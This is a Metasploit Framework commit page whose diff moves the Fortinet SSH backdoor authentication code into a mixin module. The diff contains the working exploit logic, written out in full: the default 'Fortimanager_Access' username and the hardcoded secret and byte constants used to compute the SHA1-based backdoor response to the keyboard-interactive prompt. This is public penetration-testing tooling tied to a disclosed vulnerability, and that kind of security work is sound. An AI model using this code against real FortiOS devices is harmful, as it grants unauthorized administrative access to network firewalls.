Skip to content

Commit

Permalink
Land #6612, one final missing change
Browse files Browse the repository at this point in the history
  • Loading branch information
@wvu
wvu committed Feb 29, 2016
2 parents 8c2ce96 + cb0493e commit c5a9d59
Show file tree
Hide file tree
Showing 3 changed files with 76 additions and 72 deletions.
142 changes: 72 additions & 70 deletions lib/msf/core/exploit/fortinet.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,94 +4,96 @@

require 'net/ssh'

class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract
module Msf::Exploit::Remote::Fortinet
class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract

USERAUTH_INFO_REQUEST = 60
USERAUTH_INFO_RESPONSE = 61
USERAUTH_INFO_REQUEST = 60
USERAUTH_INFO_RESPONSE = 61

def authenticate(service_name, username, password = nil)
debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }

send_message(userauth_request(
send_message(userauth_request(
=begin
string user name (ISO-10646 UTF-8, as defined in [RFC-3629])
string service name (US-ASCII)
string "keyboard-interactive" (US-ASCII)
string language tag (as defined in [RFC-3066])
string submethods (ISO-10646 UTF-8)
string user name (ISO-10646 UTF-8, as defined in [RFC-3629])
string service name (US-ASCII)
string "keyboard-interactive" (US-ASCII)
string language tag (as defined in [RFC-3066])
string submethods (ISO-10646 UTF-8)
=end
username,
service_name,
'keyboard-interactive',
'',
''
))
username,
service_name,
'keyboard-interactive',
'',
''
))

loop do
message = session.next_message
loop do
message = session.next_message

case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
return false
when USERAUTH_INFO_REQUEST
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
return false
when USERAUTH_INFO_REQUEST
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }

=begin
string name (ISO-10646 UTF-8)
string instruction (ISO-10646 UTF-8)
string language tag (as defined in [RFC-3066])
int num-prompts
string prompt[1] (ISO-10646 UTF-8)
boolean echo[1]
...
string prompt[num-prompts] (ISO-10646 UTF-8)
boolean echo[num-prompts]
string name (ISO-10646 UTF-8)
string instruction (ISO-10646 UTF-8)
string language tag (as defined in [RFC-3066])
int num-prompts
string prompt[1] (ISO-10646 UTF-8)
boolean echo[1]
...
string prompt[num-prompts] (ISO-10646 UTF-8)
boolean echo[num-prompts]
=end
name = message.read_string
instruction = message.read_string
_ = message.read_string
name = message.read_string
instruction = message.read_string
_ = message.read_string

prompts = []
prompts = []

message.read_long.times do
prompt = message.read_string
echo = message.read_bool
prompts << [prompt, echo]
end
message.read_long.times do
prompt = message.read_string
echo = message.read_bool
prompts << [prompt, echo]
end

debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }
debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }

send_message(Net::SSH::Buffer.from(
send_message(Net::SSH::Buffer.from(
=begin
byte SSH_MSG_USERAUTH_INFO_RESPONSE
int num-responses
string response[1] (ISO-10646 UTF-8)
...
string response[num-responses] (ISO-10646 UTF-8)
byte SSH_MSG_USERAUTH_INFO_RESPONSE
int num-responses
string response[1] (ISO-10646 UTF-8)
...
string response[num-responses] (ISO-10646 UTF-8)
=end
:byte, USERAUTH_INFO_RESPONSE,
:long, 1,
:string, custom_handler(name, instruction, prompts)
))
else
raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
:byte, USERAUTH_INFO_RESPONSE,
:long, 1,
:string, custom_handler(name, instruction, prompts)
))
else
raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
end
end
end
end

# http://seclists.org/fulldisclosure/2016/Jan/26
def custom_handler(title, instructions, prompt_list)
n = prompt_list[0][0]
m = Digest::SHA1.new
m.update("\x00" * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
[h]
end
# http://seclists.org/fulldisclosure/2016/Jan/26
def custom_handler(title, instructions, prompt_list)
n = prompt_list[0][0]
m = Digest::SHA1.new
m.update("\x00" * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
[h]
end

end
end
3 changes: 3 additions & 0 deletions lib/msf/core/exploit/mixins.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -116,3 +116,6 @@

# Kerberos Support
require 'msf/core/exploit/kerberos/client'

# Fortinet
require 'msf/core/exploit/fortinet'
3 changes: 1 addition & 2 deletions modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,10 +3,9 @@
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/fortinet'

class Metasploit4 < Msf::Auxiliary

include Msf::Exploit::Remote::Fortinet
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

Expand Down

0 comments on commit c5a9d59

Please sign in to comment.